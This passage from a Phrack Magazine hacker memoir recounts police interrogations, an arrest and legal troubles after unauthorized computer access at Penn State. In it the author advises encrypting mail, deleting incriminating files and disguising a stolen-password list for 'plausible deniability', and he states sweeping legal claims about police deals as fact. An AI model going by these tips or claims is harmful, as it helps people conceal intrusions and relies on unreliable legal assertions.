thoughts. They have the goods on you. In addition, any offers they make if you will give them names are legally invalid and non-binding. They can't do jack-shit for you and wouldn't if they could. The cop mind is still a human mind, and there is nothing more despicable to the human mind than a traitor. Do not allow yourself to become something that you can not tolerate being. Like Judas, the traitor commits suicide both figuratively and literally. I now retire from the soapbox and return to the confessional. My motives were pure and my conscience was clean. With a sense of self-righteousness unbecoming in a person my age, I assumed that my integrity was invulnerability, and that my refusal to give them any names was going to prevent them from fucking over my friends. I had neglected to protect my email. I had not encrypted my communications. I had not carefully deleted any incriminating information from my disks, and because of this I am as guilty as the people who blithely rat out their friends. I damaged the lives of a number of people by my carelessness, a number of people who had more at stake than I had, and all my good intentions were not worth a damn. I had one encrypted file, that a list of compromised systems and account names, and that was DES encrypted with a six-character alphanumeric. As I revelled in my self-righteousness, Dan Ehrlich and Robert Owens arrived with a two-foot high pile of hardcopy on which was printed every file on my PSUVM accounts, including at least a year of email and all my posts to the net, including those in groups such as alt.drugs, and articles by other people. Wayne assumed that any item on the list, even saved posts from other people, was something that had been sent to me personally by its author, and that these people were, thus, involved in some vast conspiracy. While keeping the printed email out of my sight, he began listing names and asking me for information about that person. I answered, for every person, that I knew nothing about that person except what they knew. He asked such questions as "What is Emily Postnews' real name, and how is she involved in the conspiracy?" Ehrlich and Owens had conveniently disappeared, so I couldn't expect them to explain the situation to Wayne; and had, myself, given up any attempt to explain, realizing that anything I said would simply reinforce the cops' paranoid conspiracy theories. By then, I was refusing to answer practically every question put to me, and finally realized I was outgunned. When I had arrived, I was puffed up with bravado and certain that I could talk my way out of this awful situation. Having made rather a hash of it as a hacker, I resorted to my old standby, my tongue, with which I had been able to escape any previous situation. However, not only had I not talked my way out of being busted, I had talked my way further into it. If you believe, from years of experience at social engineering, that you will be able to talk your way out of being busted, I wish you luck; but don't expect it to happen. If you talk with the police, and you are not under arrest at the time, expect that one or two of your sentences will be able to be taken out of context and used as a justification for issuing an arrest warrant. If you talk with the police and you are under arrest, the Miranda statement: "Anything you say can and will be held against you in a court of law," is perhaps the only true statement in that litany of lies. In any case, my bravado had collapsed. I still pointedly called the cops "Wayne" and "Jeff," but otherwise, resorted to repeating mechanically that I knew nothing about nothing. Owens and Ehrlich returned, and announced that they had discovered an encrypted file on my account, called holy.nodes. I bitterly regretted the flippant name, and the arrogance of keeping such a file. If you must have an encrypted list of passwords and accounts sitting around, at least give it a name that makes it seem like some sort of executable, so that you have plausible deniability. They assured me that they could decrypt it within six hours on a Cray Y-MP to which they had access. I knew that the Computer Science Department had access to a Cray at the John von Neuman Computer Center. I made a brief attempt to calculate the rate of brute-force password cracking on a Cray and couldn't do it in my head. However, as the password was only six alphanumeric characters, I realized that it was quite possible that it could be cracked. I believe now that I should have called their bluff, but I gave them the key, yet another in a series of stupid moves. Shortly, they had a list of computer sites, accounts and passwords, and Wayne began grilling me on those. Owens was livid when he noted that a machine at Lawrence-Berkeley Labs, shasta.lbl.gov, was in the list. This was when my trouble started. You might recall that Lawrence-Berkeley Labs figures prominently in Clifford Stoll's book _The Cuckoo's Egg_. The Chaos Computer Club had cracked a site there in the mistaken belief that it was Lawrence- Livermore. As it happens, I had merely noticed a guest account there, logged in and done nothing further. Of course, this was too simple an explanation for a cop to believe it. Owens had given the police a tiny bit of evidence to support the bizarre structure of conspiracy theories they had built; and a paranoid delusion, once validated in even the most inconsequential manner, becomes unshakably firm. Wayne returned to the interrogation with renewed vigor. I continued giving answers to the effect that I knew nothing. He came to the name of Raymond Gary [*], who had generously allowed me to use an old account on PSUVM, that of a friend of his who had left the area. I attempted to assure them of his innocence. This was another bad move. It was a bad move because this immediately reinforces the conspiracy theory, and the cops wish to have more information on that person. I obfuscated, and returned to the habit of repeating: "Not to the best of my recollection," as if I were in the Watergate hearings. Another name surfaced, that of a person who had allowed me to use his account because our respective machines could not manage a tolerable talk connection. This person, without his knowledge, joined the conspiracy. Once again, I foolishly tried to explain the situation. This simply made it worse, as the cop did not understand a word I was saying; and Owens was incapable of appreciating the difference between violating the letter of the law and the spirit of the law. Wayne repeatedly asked about my overseas friends, informed me that he knew there were foreign governments involved, again told me that a friend of mine had informed on me. I was told lies so outrageous that I hesitate to put them on paper. I denied everything. I made another lengthy attempt at explanation, trying to defuse the conspiracy theory, and gave a speech on the difference between breaking into someone's house and ripping off everything there, voyeuristically spying on people, and temporarily borrowing an account simply to talk to someone because a network link was not working. I made an analogy between this and asking someone who is driving a corporate vehicle to give a jump to a disabled vehicle, and tried to explain that this was certainly not the same as if the authorized user of the corporate vehicle had simply handed a passerby the keys. I again attempted to explain the Internet, leased lines, the difference between FTP and mail, why everyone on the Internet allowed anyone else to transfer files from, to and through their machines, and once again failed to explain anything. Directly following this tirade, delivered almost at a shout, Wayne leaned over the desk and asked me: "Who's Bubba?" This was too much to tolerate. My ability to take the situation seriously, already very shaky, simply vanished in the face of this absurdity. I lost it entirely. I laughed hysterically. I asked, my anger finally getting the better of my amusement: "What the fuck kind of question is that?" He repeated the question, not appreciating the humor inherent in this absurd contretemps; I was beyond trying to maintain the appearance of solemnity. Everything, the battered table, the primitive tape recorder, the stony-faced cops, the overweight computer security guys, seemed entirely empty of meaning. I could no longer accept as real that I was in this dim room with a person asking me the question: "Who's Bubba?" I said: "I have no idea. You tell me." Finally, Wayne came to Dale's name. Dale did not use his last name in any of the email he had sent to me, and I hoped that his name was not in any file on any machine anywhere. I recovered some of my equilibrium, and refused to answer. A number of references to "lab supplies" were made in the email, and I was questioned as to the meaning of this phrase. I answered that it simply meant quarter-inch reels of tape for music. They refused to accept this explanation, and accused me of running a drug ring over the computer network. Veiled threats, repetitions of the question, rephrasings of it, assurances that they were going to get everyone anyway, and similar cop routines followed. Finally, having had altogether too much of this nonsense, I said: "This interview's over. I'm leaving." As simply as that, and as quickly, I got up and left. I wish I could say that I did not look back, but I did glance over my shoulder as I left. "We'll be in touch," said Wayne. "Yeah, sure," I said. VII. Thirty Pieces of Silver I informed Dale of the ominous turn in the investigation, and told him that the cops were now looking for him. From a sort of fatalistic curiosity, we logged into Shamir's account to watch the activities of the computer security guys, and to confer with some of their associates to find out what their motivations might be. We had decided that the possibility of a wiretap was slim, and that if there were a wiretap, we were doomed anyway, so what the hell? There is no conclusive evidence that there was a wiretap, but the police would not have needed a warrant to tap university phones, as they are on a private branch exchange, which does not qualify for legal protection. In addition, one bit of circumstantial evidence strikes me as indicative of the possibility of a wiretap, that being that when Dale called Shamir to explain the situation, and left a message in his voice mail box, the message directly following Dale's was from Wayne. We frequented the library, researching every book dealing with the subject of computer crime, reading the Pennsylvania State Criminal Code, photocopying and transcribing important texts, and compiling a disk of information relevant to the case, including any information that someone "on the outside" would need to know if we were jailed. I badly sprained my ankle in this period, but walked on it for three miles, and it was not until later in the night that I even realized there was anything wrong with it, so preoccupied was I by the bizarre situation in which I was embroiled. In addition, an ice storm developed, leaving a thin layer of ice over sidewalks, roads and the skeletal trees and bushes. I must have seemed a ridiculous figure hobbling across the ice on a cane, looking over my shoulder every few seconds; and attempting to appear casual whenever a police car passed. It seemed that wherever I went, there was a police car which slowed to my pace, and it always seemed that people were watching me. I tried to convince myself that this was paranoia, that not everyone could be following me, but the feeling continued to intensify, and I realized that I had adopted the mentality of the cops, that we were, essentially, part of the same societal process; symbiotic and necessary to each other's existence. The term 'paranoia' had no meaning when applied to this situation; as there were, indeed, people out to get me; people who were equally convinced that I was out to get them. I resolved to accept the situation, and abide by its unspoken rules. As vast as the texts are which support the law, there is another entity, The Law, which is infinite and can not be explained in any number of words, codes or legislation. Dale and I painstakingly weighed our options. Finally, Dale decided that he was going to contact the police, and called a friend of his in the police department to ask for assistance in doing so, Stan Marks [*], who was also an electronic musician. On occasion, Stan would visit us in the Lab, turning off his walkie- talkie to avoid the irritation of the numerous trivial assignments which comprise the day-to-day life of the university cop. After conferring with Stan, he decided simply to call Wayne and Jeff on the phone to arrange an interview. I felt like shit. The repercussions of my actions were spreading like ripples on a pond, and were to disrupt the lives of several of my dearest friends. At the same time, I was enraged. How dare they do this? What had I done that warranted this torturous and ridiculous investigation? Wasn't this investigation enough of a punishment just in and of itself? I wondered how many more innocent people would have to be fucked over before the police would be satisfied, and wondered how many innocent people, every day, are similarly fucked over in other investigations. How many would it take to satisfy the cops? The answer is, simply, every living person. If you believe that your past, however lily-white, would withstand the scrutiny of an investigation of several months' duration, with every document and communication subjected to minute investigation, you are deluding yourself. To the law-enforcement mentality, there are no innocent people. There are only undiscovered criminals. Only if we are all jailed, cops and criminals alike, will the machinery lie dormant, to rust its way to gentle oblivion; and only then will the ruins be left undisturbed for the puzzlement of future archaeologists. With these thoughts, I waited as Dale went to the police station, with the realization that I was a traitor by inaction, by having allowed this to happen. I was guilty, but this guilt was not a matter of law. My innocent actions were those which were to be tried. If you are ever busted, you will witness this curious inversion of morality, as if by entering the world of cops you have walked through a one-way mirror, in which your good actions are suddenly and arbitrarily punished, and the evil you have done is rewarded. VIII. Third and Fourth Interrogations I waited anxiously for Dale to return from his meeting. He had brought with him a professional tape recorder, in order to tape the interview. The cops were rather upset by this turn of events, but had no choice but to allow him to tape. While they attempted to get their tape recorder to work, he offered to loan them a pair of batteries, as theirs were dead. The interrogation followed roughly the same twists and turns as mine had, with more of an emphasis on the subject of "lab supplies." Question followed question, and Dale insisted that his actions were innocent. "Hell, if we'd have had a couple of nice women, none of this would even have happened," he said. When asked about the Huang account that Ron Gere had created for him, he explained that Huang was a nom-de-plume, and certainly not an alias for disguising crime. The police persisted, and returned to the subject of "lab supplies", and finally declared that they knew Dale and I were dealing in some sort of contraband, but that they would be prepared to offer leniency if he would give them names. Dale was adamant in his refusal. Finally, they said that they wanted him to make a drug buy for them. "Well, you'll have to introduce me to someone, because I sure don't know anyone who does that kind of stuff." Eventually, they set an appointment with him to speak with Ron Schreffler, the university cop in charge of undercover narcotics investigations. He called to reschedule the appointment a few days later, and then, eventually, cancelled it entirely, saying: "I have nothing to talk to him about." Finally, they ceased following this tack, realizing that even in Pennsylvania pursuing an entirely fruitless avenue of investigation is seen very dimly by their superiors. The topic of "lab supplies" was never mentioned again, and certainly not in the arrest warrant affidavit, as we were obviously innocent of any wrongdoing in that area. Warning Dale not to leave the area, they terminated the interview. Shortly thereafter, there was a fourth and final interview, with Dale and I present. We discussed nothing of any significance, and it was almost informal, as if we and the cops were cronies of some sort. Only Jeffery Jones was excluded from this circle, as he was limited largely to monosyllabic grunts and wild, paranoid accusations. We discovered that Wayne Weaver was a twenty-three year veteran, and it struck me that if I had met him in other circumstances I could have found him quite likable. He was, if nothing else, a professional, and acted in a professional manner even when he was beyond his depth in the sea of information which Dale and I navigated with ease. I felt almost sympathetic toward him, and wondered how it was for him to be involved in a case so complex and bizarre. I still failed to realize why he was acting toward us as he was, and realized that he, similarly, had no idea what to make of us, who must have seemed to him like remorseless, arrogant criminals. Unlike my prejudiced views of what a police officer should be, Wayne was a competent, intelligent man doing the best he could in a situation beyond his range of experience, and tried to behave in a conscientious manner. I feel that Wayne was a good man, but that the very system he upheld gave him no choice but to do evil, without realizing it. I am frustrated still by the fact that no matter how much we could discuss the situation, we could never understand each other in fullness, because our world-views were so fundamentally different. Unlike so many of the incompetent losers and petty sadists who find police work a convenient alternative to criminality, Wayne was that rarity, a good cop. Still, without an understanding of the computer subculture, he could not but see anything we might say to explain it to him as anything other than alien and criminal, just as a prejudiced American finds a description of the customs of some South Sea tribe shocking and bizarre. Until we realize what underlying assumptions we share with the rest of society, we shall be divided, subculture from culture, criminals from police. The ultimate goal of the computer underground is to create the circumstances which will underlie its own dissolution, to enable the total and free dissemination of all information, and thus to destroy itself by becoming mainstream. When everyone thinks nothing of doing in daylight what we are forced to do under cover of darkness, then we shall have succeeded. Until then, we can expect the Operation Sun-Devils to continue, and the witch-hunts to extend to every corner of cyberspace. The public at large still holds an ignorant dread of computers, having experienced oppression by those who use computers as a tool of secrecy and intrusion, having been told that they are being audited by the IRS because of "some discrepancies in the computer," that their paycheck has been delayed because "the computer's down," that they can't receive their deceased spouse's life-insurance benefits because "there's nothing about it in the computer." The computer has become both omnipresent and omnipotent in the eyes of many, is blamed by incompetent people for their own failure, is used to justify appalling rip-offs by banks and other major social institutions, and in addition is not understood at all by the majority of the population, especially those over thirty, those who comprise both the law-enforcement mentality and aging hippies, both deeply distrustful of anything new. It is thus that such a paradox would exist as a hacker, and if we are to be successful, we must be very careful to understand the difference between secrecy and privacy. We must understand the difference between freedom of information and freedom from intrusion. We must understand the difference between invading the inner sanctum of oppression and voyeurism, and realize that even in our finest hours we too are fallible, and that in negotiating these finely-hued gray areas, we are liable to lose our path and take a fall. In this struggle, we can not allow a justifiable anger to become hatred. We can not allow skepticism to become nihilism. We can not allow ourselves to harm innocents. In adopting the intrusive tactics of the oppressors, we must not allow ourselves to perform the same actions that we detest in others. Perhaps most importantly, we must use computers as tools to serve humanity, and not allow humans to serve computers. For the non-living to serve the purposes of the living is a good and necessary thing, but for the living to serve the purposes of the non-living is an abomination.  ==Phrack Magazine== Volume Four, Issue Forty-Three, File 13 of 27 [My Bust Continued] IX. Consultations Dale and I began to consider options in our battle against this senseless investigation. We spent many nights pondering the issue, and arrived at a number of conclusions. Since we had already talked to the police, and were rapidly realizing what a vast error that had been, we wondered how it was possible to sidestep, avoid or derail the investigation. We hoped that Ron Gere and others would not be held accountable for my actions, a wish that was to be denied. A great deal of resentment existed toward me in those whose lives were affected, and I would be either an idiot or a liar to deny that my actions affected many people, in many places, some of whom I had never even met in person. However, I was unable to do anything for many of these people, so I concentrated largely on my own survival and that of those near me. Dale and I decided, eventually, that the only person who could claim any real damage was Dhamir Mannai, and we arranged an appointment with him to discuss what had happened. We met in his book-lined office in the Electrical Engineering Office, and shook hands before beginning a discussion. I explained what I had done, and why I had done it, and apologized for any damages that had occurred. Dale, similarly, excused my actions, and while he had nothing to do with them, noted that he was under investigation as well. We offered to help repair the /etc/groups file which I had damaged, but due to the circumstances, it is understandable that he politely declined our offer. Dhamir was surprisingly sympathetic, though justifiably angered. However, after about a half hour of discussion, he warmed from suspicion to friendliness, and after two hours of discussion he offered to testify for us against the police, noting that he had been forced on two previous occasions to testify against police. He held a very dim view of the investigation, and noted that "The police have bungled the case very badly." Dhamir, in fact, was so annoyed by the investigation that he called Wayne that night to object to it. He made it clear that he intended to oppose the police. The next night, as Dale and I were entering the Music Building, a police cruiser came to a sudden stop in the parking lot and Wayne walked up to us with a perturbed expression. Without pausing for greetings, he informed us that he was now considering filing additional charges against us for "Tampering with Witnesses," without identifying the witness. In his eyes, the legality of restraining our actions and speech based on hypothetical and unfiled charges was not relevant; and he was angry that a primary witness had been rendered useless to him. Finally, we talked more informally. Genuinely curious about his motivations, we asked him about the investigation and what turns could be expected in the future. Realizing that the investigation had entered a quiescent stage and we would not likely meet again until court, we talked with him. Dale said "So let me get this straight. They saddled the older, more experienced cop with the recruit?" Wayne didn't answer, but nodded glumly. "What's this like for you?" I asked. "Well, I have to admit, in my twenty-three years on the force, this case is the biggest hassle I've ever had." "I can see why," said Dale. "I almost wish you had been in charge of this case, instead of that goof Jeff," I said. "Yes, he's too jumpy," said Dale. "Like an Irish Setter with a gun." "Well, if I'd been in charge of this case," Wayne said, "it would have been down the pike a long time ago." After more discussion of this sort, Wayne's walkie-talkie burst into cop chatter. "We have three men, throwing another man, into a dumpster, behind Willard," the voice said. "I guess this means you have to leave, Wayne," said Dale. Wayne looked embarrassed. We exchanged farewells. Another very helpful person was Professor Richard Devon, of the Science, Technology and Science department of Penn State. We read an article he wrote on the computer underground which, while hardly condoning malicious hacking, certainly objected to the prevailing witch-hunt mentality. We contacted him to discuss the case. He offered to provide testimony in our behalf, and informed us of the prevailing attitudes of computer security professionals at Penn State and elsewhere. He corroborated our belief that the vendetta against us was largely due to the fact that we had embarrassed Penn State, and that the intensity of the investigation was also largely due to fallout from the Morris Worm incident. The fact that he was on the board of directors for the Engineering Computer Lab increased the value of his testimony. We were expecting damaging testimony from Bryan Jensen of ECL. He was friendly and personable, and we talked for several hours. While there was nothing he could do until the time came to give testimony, it was very gratifying to find two friends and allies in what we had thought was a hostile camp. Our feeling of isolation and paranoia began to dwindle, and we began to feel more confident about the possible outcome of the investigation. X. Going Upstairs With a new-found confidence, we decided to see if it were possible to end this investigation entirely before charges were filed and it became a criminal prosecution. Dale called the Director of Police Services with the slim hope that he had no knowledge of this investigation and might intervene to stop it. No dice. Dale and I composed a letter to the district attorney objecting to the investigation, also in the hopes of avoiding the prosecution of the case. I include the letter: Dear Mr. Gricar: We are writing to you because of our concerns regarding an investigation being conducted by the Pennsylvania State University Department of University Safety with respect to violations of Pa.C.S.A. tilde 3933 (Unlawful Use of Computer) alleged to us. We have enclosed a copy of this statute for your convenience. Despite recommendations from NASA security officials and concerned members of the professional and academic computing community that we file suit against the Pennsylvania State Universities, we have tried earnestly to accommodate this investigation. We have cooperated fully with Police Services Officers Wayne Weaver and Jeffrey Jones at every opportunity in this unnecessary eight-week investigation. However, rather than arranging for direct communication between the complaining parties and us to make it possible to make clear the nature of our activities, the University Police have chosen to siphon information to these parties in an easily-misinterpreted and secondhand manner. This has served only to obscure the truth of the matter and create confusion, misunderstanding and inconvenience to all involved. The keen disappointment of the University Police in finding that we have not been involved in espionage, electronic funds transfer or computer terrorism appears to have finally manifested itself in an effort to indict us for practices customary and routine among faculty and students alike. While we have come to realize that activities such as using a personal account with the permission of the authorized user may constitute a violation of an obscure and little-known University policy, we find it irregular and unusual that such activities might even be considered a criminal offense. The minimal and inferential evidence which either will or has already been brought before you is part of a preposterous attempt to shoehorn our alleged actions into the jurisdiction of a law which lacks relevance to a situation of this nature. We have found this whole affair to be capricious and arbitrary, and despite our reasonable requests to demonstrate and display our activities in the presence of computer-literate parties and with an actual computer, they have, for whatever reasons, denied direct lines of communication which could have enabled an expeditious resolution to this problem. This investigation has proceeded in a slipshod manner, rife with inordinate delays and intimidation well beyond that justified by an honest desire to discern the truth. While certain evidence may appear to warrant scrutiny, this evidence is easily clarified; and should the District Attorney's office desire, we would be pleased to provide a full and complete accounting of all our activities at your convenience and under oath. In view of the judicial system being already overtaxed by an excess of important and pressing criminal cases, we would like to apologize for this matter even having encroached on your time. Sincerely yours, Dale Garrison Robert W. F. Clark This letter had about as much effect as might be imagined, that is to say, none whatever. My advice from this experience is that it is very likely that you will be able to find advice in what you might think to be a hostile quarter. To talk to the complaining party and apologize for any damage you might have caused is an excellent idea, and has a possibility of getting the charges reduced or perhaps dropped entirely. Simply because the police list a person as a complaining party does not necessarily mean that the person necessarily approves of, or even has knowledge of, the police proceedings. In all likelihood, the complaining parties have never met you, and have no knowledge of what your motivations were in doing what you did. With no knowledge of your motives, they are likely to attribute your actions to malice. If there are no demonstrable damages, and the person is sympathetic, you may find an ally in the enemy camp. Even if you have damaged a machine, you are in a unique position to help repair it, and prevent further intrusion into their system. Regardless of the end result, it can't hurt to get some idea of what the complaining parties think. If you soften outright hostility and outrage even to a grudging tolerance, you have improved the chance of a positive outcome. While the police may object to this in very strong terms, and make dire and ambiguous threats, without a restraining order of some kind there is very little they can do unless you have bribed or otherwise offered a consideration for testimony. Talking to the police, on the other hand, is a very bad idea, and will result in disaster. Regardless of any threats and intimidation they use, there is absolutely nothing they can do to you if you do not talk to them. Any deal they offer you is bogus, a flat-out lie. They do not have the authority to offer you a deal. These two facts can not be stressed enough. This may seem common knowledge, the sort even an idiot would know. I knew it myself. However, from inexperience and arrogance I thought myself immune to the rules. I assumed that talking to them could damage nothing, since I had done nothing wrong but make a mistake. Certainly this was just a misunderstanding, and I could easily clear it up. The police will encourage you to believe this, and before you realize it you will have told them everything they want to know. Simply, if you are not under arrest, walk away. If you are under arrest, request an attorney. Realize that I, a confirmed paranoid, knowing and having heard this warning from other people, still fell into the trap of believing myself able to talk my way out of prosecution. Don't do the same thing yourself, either from fear or arrogance. Don't tell them anything. They'll find out more than enough without your help. XI. Interlude Finally, after what had seemed nearly two weeks of furious activity, constant harassment and disasters, the investigation entered a more or less quiescent state. It was to remain in this state for several months. This is not to say that the harassment ceased, or that matters improved. The investigation seemed to exist in a state of suspended animation, from our viewpoint. Matters ceased getting worse exponentially. Now, they merely got worse arithmetically. My parents ejected me from home for the second time due to my grades. They did not know about the police investigation. I was in no hurry to tell them about it. I could have went to live with my father, but instead I returned to State College by bus, with no money, no prospects and no place to live. I blamed the police investigation for my grades, which was not entirely correct. I doubt, however, that I would have failed as spectacularly as I had if the police had not entered my life. Over the Christmas break, when the campus was mostly vacant, Dale noticed a new set of booted footprints in the new-fallen snow every night, by the window to the Electronic Music Lab, and by that window only. A few times, I heard static and odd clicks on the telephone at the Lab, but whether this was poor telephone service or some clumsy attempt at a wiretap I can not say with assurance. I discovered that my food card was still valid, so I had a source of free food for a while. I had switched to a nocturnal sleep cycle, so I slept during the day in the Student Union Building, rose for a shower in the Athletics Building at about midnight, and hung out in the Electronic Music Lab at night. Being homeless is not as difficult as might be imagined, especially in a university environment, as long as one does not look homeless. Even if one does look scruffy, this will raise few eyebrows on a campus. Around this time, I switched my main interest from computer hacking to reading and writing poetry, being perhaps the thousandth neophyte poet to use Baudelaire as a model. I suppose that I was striving to create perfection from imperfect materials, also my motivation for hacking. Eventually, Dale offered to let me split the rent with him on a room. The police had 'suggested' that WPSX-TV3 fire him from his job as an audio technician. Regardless of the legality of this skullduggery, WPSX-TV3, a public television station, reprehensibly fired him. This is another aspect of the law-enforcement mentality which bears close examination. While claiming a high moral ground, as protectors of the community, they will rationalize a vendetta as somehow protecting some vague and undefined 'public good.' With the zeal of vigilantes, they will eschew the notion of due process for their convenience. Considering the law beneath them, and impatient at the rare refusal of judges and juries to be a rubber-stamp for police privilege, they will take punishment into their own hands, and use any means necessary to destroy the lives of those who get in their way. According to the Random House Dictionary of the English Language (Unabridged Edition): Police state: a nation in which the police, especially a secret police, suppresses any act by an individual or group that conflicts with governmental policy or principle. Since undisclosed members of CERT, an organization directly funded by Air Force Intelligence, are authorized to make anonymous accusations of malfeasance without disclosing their identity, they can be called nothing but secret police. The spooks at the CIA and NSA also hold this unusual privilege, even if one does not consider their 'special' operations. What can these organizations be called if not secret police? It can not be denied, even by those myopic enough to believe that such organizations are necessary, that these organizations comprise a vast and secret government which is not elected and not subject to legal restraint. Only in the most egregious cases of wrongdoing are these organizations even censured; and even in these cases, it is only the flunkies that receive even a token punishment; the principals, almost without exception, are exonerated and even honored. Those few who are too disgraced to continue work even as politicians ascend to the rank of elder statesmen, and write their memoirs free from molestation. When your job, your property and your reputation can be destroyed or stolen without recompense and with impunity, what can our nation be called but a police state? When the police are even free to beat you senseless without provocation, on videotape, and still elude justice, what can this nation be called but a police state? Such were my thoughts during the months when the investigation seemed dormant, as my anger began, gradually, to overcome my fear. This is the time that I considered trashing the Penn State data network, the Internet, anything I could. Punishment, to me, has always seemed merely a goad to future vengeance. However, I saw the uselessness of taking revenge on innocent parties for the police's actions. I contacted the ACLU, who showed a remarkable lack of interest in the case. As charges had not been filed, there was little they could do. They told me, however, to contact them in the event that a trial date was set. "If you cannot afford an attorney, one will be provided for you." This is, perhaps, the biggest lie in the litany of lies known as the Miranda rights. It is the court which prosecutes you that decides whether you can afford an attorney, and the same court selects that attorney. Without the formal filing of charges, you can not receive the assistance of a public defender. This is what I was told by the public defender's office. Merely being investigated apparently does not entail the right to counsel, regardless of the level of harassment involved in the investigation. We remained in intermittent contact with the police, and called every week or so to ask what was happening. We learned nothing new. The only information of any importance I did learn was at a party. Between hand-rolled cigarettes of a sort never sold by the R. J. Reynolds' Tobacco Company, I discussed my case. This might not be the sort of thing one would normally do at a party, but if you are busted you will find that the investigation takes a central role in your life. When you are not talking about it, you are thinking about it. When you are not thinking about it, you are trying the best you can not to think about it. It is a cherished belief of mine that anyone who survives a police investigation ought to receive at least an Associate's degree in Criminal Law; you will learn more about the law than you ever wished to know. The person on my right, when I said that Jeffery Jones was in charge of the case, immediately started. "He was in my high school class," said the man, who sported a handlebar mustache. "What? Really? What's he like? Is he as much of an asshole in person?" I asked. "He was kind of a weird kid." "How? What's he done? Have you kept in touch?" "Well, all I really know about him is that he went out to be a cop in Austin, but he couldn't take it, had a breakdown or something, and came back here." "I can see that. He's a fucking psycho." I gloated over this tidbit of information, and decided that I would use it the next time I met the police. This was to be several weeks. Though we had given the police our work schedules, phone numbers at home, work and play; and informed them when they might be likely to locate us at any particular place, we had apparently underestimated the nearly limitless incompetence of Penn State's elite computer cops. As he was walking to work one day, Dale saw Jeffery Jones driving very slowly and craning his neck in all directions, apparently looking for someone. However, he failed to note the presence of Dale, the only person on the street. Dale wondered whether Jeffery had been looking for him. The next night at the Lab, the telephone rang. With a series of typical, frenzied accusations Jeffery Jones initiated the conversation. He believed that we had been attempting to escape or evade him in some manner. Wayne was on another line, and Dale and I talked from different phones. "You've been trying to avoid us, haven't you?" Jeffery shouted. "Where have you been?" asked Wayne. "We told you where we'd be. You said you'd be in touch," I said. "We haven't been able to find you," said Wayne. "Look, you have our goddamn work schedule, our address, our phone numbers, and where we usually are. What the hell else do you need?" asked Dale. "We went to your address. The guy we talked to didn't know where you were," said Wayne. As we discovered later that night, the police had been at our apartment, and had knocked on the wrong door, that of our downstairs neighbor, a mental patient who had been kicked out of the hospital after Reagan's generous revision of the mental health code. His main activity was shouting and threatening to kill people who weren't there, so the consternation of the police was not surprising. "So we weren't there. You could have called," said Dale. "I just hope you don't decide to leave the area. We're going to arrest you in a couple of days," said Wayne. "You've been saying that for the last three months," I said. "What's taking so long?" "The secretary's sick," said Jeffery. "You ought to get this secretary to a doctor. She must be really goddamn sick, if she can't type up an arrest warrant in three months," said Dale. "Hell, I'll come down and type up the damn thing myself, if it's too tough for the people you have down there," I offered. "No, that won't be necessary," said Wayne. "Look, when you want to arrest us, just give us a call and we'll come down. Don't pull some dumb cop routine like kicking in the door," said Dale. "Okay," Wayne said. "Your cooperation will be noted." "By the way, Jeff, I heard you couldn't hack it in Austin," I said. Silence followed. After an awkward silence, Wayne said: "We'll be in touch." We said our goodbyes, except for Jeffery, and hung up the phones. I somewhat regretted the last remark, but was still happy with its reception. It is probably unwise to play Scare-the-Cops, but by then I no longer gave a damn. He was probably dead certain that I had found this information, and other tidbits of information I had casually mentioned, in some sort of computer database. His mind was too limited to consider the possibility that I had met an old high-school chum of his and pumped him for information. By this time, our fear of the police had diminished, and both of us were sick to death of the whole business. We just hoped that whatever was to happen would happen more quickly. When the police first started threatening to arrest us within days, it would send a tremor down my spine. However, after three months of obfuscation, excuses, continued harassment of this nature, my only response to this threat was anger and boredom. At least, upon arrest, we would enter a domain where there were some rules of conduct and some certainty. The Kafkaesque uncertainty and arbitrarily redefined rules inherent in a police investigation were intolerable. After another month of delay, the police called us again, and we agreed to come in to be arrested at nine o'clock the next morning. It was possible that the police would jail us, but it seemed unlikely. Two prominent faculty members had strongly condemned the behavior of the police. The case was also politically-charged, and jailing us would likely have resulted in howls of outrage, and perhaps even in a civil or criminal suit against Penn State. Wayne told us that we would have to go to the District Magistrate for a preliminary hearing. Dale said that we would go, but demanded a ride there and back. The police complied. We were more relieved than worried. Finally, something was happening. XII. The Arrest On a cold and sunny morning we walked into the police station to be arrested. I was curious as to the fingerprinting procedure. The cops were to make three copies of my fingerprints, one for the local police, one for the state police, and one for the FBI. Jeffery was unable to fingerprint me on the first two attempts. When he finally succeeded in fingerprinting me, he had to do it again. He had incorrectly filled out the form. Finally, with help from Wayne, he was able to fingerprint me. Dale was more difficult. Jeffery objected to the softness of Dale's fingers, and said that would make it difficult. The fact that Dale's fingers were soft, as he is a pianist more accustomed to smooth ivory than plastic, would seem to exonerate him from any charge of computer hacking. However, such a thought never troubled the idyllic vacancy of Jeffery's mind. He was too busy bungling through the process of fingerprinting. Wayne had to help him again. There was soap and water for washing the ink from our fingers. However, it left the faintest trace of ink on the pads of my fingers, and I looked at the marks with awe, realizing that I had been, in a way, permanently stigmatized. However, as poorly as the soap had cleaned my fingers, I thought with grim amusement that Jeffery would have much more difficulty cleaning the ink from his clothes. Jeffery did not take the mug shots. A photographer took them. Therefore, it went smoothly. Finally, Wayne presented me with an arrest warrant affidavit, evidently written by Jeffery Jones. A paragon of incompetence, incapable of performing the simplest task without assistance, Jeff had written an eighteen-page arrest warrant affidavit which was a marvel of incoherence and inaccuracy. This document, with a list of corrections and emendations, will appear in a separate article. While reading the first five pages of this astounding document, I attempted to maintain an air of solemnity. However, by the sixth page, I was stifling giggles. By the seventh, I was chuckling out loud. By the eighth page I was laughing. By the ninth page I was laughing loudly, and I finished the rest of the document in gales of mirth. Everyone in the room stared at me as if I were insane. This didn't bother me. Most of my statements to the police resulted in this sort of blank stare. Even Dale looked as if he thought I had cracked, but he understood when he saw his arrest warrant affidavit, nearly identical to mine. I simply was unable to take seriously that I had spent months worrying about what kind of a case they had, when their best effort was this farrago of absurdities. They took us to Clifford Yorks, the District Magistrate, in separate cars. This time, we rode in the front seat, and two young recruits were our chauffeurs. Dale asked his driver if he could turn on the siren. The cop was not amused. The only thing which struck me about Clifford Yorks was that he had a remarkably large head. It appeared as if it had been inflated like a beach ball. The magistrate briefly examined the arrest warrant affidavits, nodded his vast head, and released us on our own recognizance, in lieu of ten thousand dollars bail. He seemed somewhat preoccupied. We signed the papers and left. The police offered to give us a ride right to our house, but we said we'd settle for being dropped off in town. Being over a month in arrears for rent, we did not like the idea of our landlord seeing us arrive in separate police cars; also, our address was rather notorious, and other residents would be greatly suspicious if they saw us with cops. An arraignment was scheduled for a date months in the future. The waiting game was to resume. XIII. Legal Counsel Having been arrested, we were at last eligible for legal counsel. We went to the yellow pages and started dialing. We started with the attorneys with colored half-page ads. Even from those advertising "Reasonable Rates," we received figures I will not quote for fear of violating obscenity statutes. Going to the quarter-page ads, then the red-lettered names, then the schmucks with nothing but names, we received the same sort of numbers. 